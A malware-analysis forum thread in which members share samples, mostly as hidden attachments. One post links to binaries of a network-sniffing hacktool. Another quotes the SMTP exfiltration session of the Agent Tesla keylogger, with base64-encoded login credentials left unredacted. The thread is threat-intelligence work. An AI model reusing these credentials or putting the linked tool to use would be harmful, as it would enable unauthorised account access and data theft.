Malware collection

Forum for analysis and discussion about malware.
Post Reply
FafZee
Posts: 24
Joined: Tue Mar 19, 2013 11:08 am

Re: Malware collection

Post by FafZee » Wed Mar 08, 2017 3:15 pm

Not a real malware but a hacktools.

More details on it:
hxxp://sniff.su/ ("official" site)
https://github.com/intercepter-ng/mirror (for the binaries)

Br,

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sat Mar 11, 2017 10:48 am

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Thu Mar 16, 2017 5:45 pm

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Thu Mar 30, 2017 3:24 pm

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Fri Apr 07, 2017 5:28 pm

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sat Apr 08, 2017 1:04 pm

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sat Apr 08, 2017 6:51 pm

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Mon Apr 17, 2017 10:39 am

You do not have the required permissions to view the files attached to this post.

Antelox
Posts: 178
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Mon Apr 17, 2017 3:00 pm

This is Agent Tesla keylogger. A sample of the email header sent containing exfiltred data:
EHLO [redacted]
AUTH login d2VibWFzdGVyQGFtY293ZWxkLmNvbS5teQ==
RWlnaHRpczg4
MAIL FROM:<webmaster@amcoweld.com.my>
RCPT TO:<webmaster@amcoweld.com.my>
DATA
MIME-Version: 1.0
From: webmaster@amcoweld.com.my
To: webmaster@amcoweld.com.my
Date: 17 Apr 2017 20:54:42 +0200
Subject: [redacted] Passwords Recovered From: [redacted] [Agent Tesla]
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
BR,

Antelox

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Fri Apr 21, 2017 5:08 pm

You do not have the required permissions to view the files attached to this post.

Post Reply